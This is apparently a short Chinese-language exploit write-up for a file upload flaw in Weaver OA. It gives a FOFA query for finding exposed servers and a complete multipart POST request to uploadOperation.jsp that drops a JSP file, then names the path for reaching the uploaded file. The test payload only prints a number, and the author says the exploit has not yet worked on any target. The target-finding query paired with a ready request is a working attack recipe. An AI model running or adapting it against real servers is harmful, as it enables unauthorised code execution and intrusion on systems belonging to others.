0x00 简介

0x01 fofa语法

fofa app=”Weaver-OA”

0x02 漏洞利用

  1. POST /page/exportImport/uploadOperation.jsp HTTP/1.1
  2. Host: x.x.x.x
  3. Content-Length: 216
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. Origin: http://x.x.x.x/
  7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
  8. Connection: close
  10. ------WebKitFormBoundaryFy3iNVBftjP6IOwo
  11. Content-Disposition: form-data; name="file"; filename="12.jsp"
  12. Content-Type: application/octet-stream
  14. <%out.print(1111);%>
  15. ------WebKitFormBoundaryFy3iNVBftjP6IOwo--

然后访问page/exportImport/fileTransfer/12.jsp

0x03 总结

还没成功利用过,没找到存在该漏洞的目标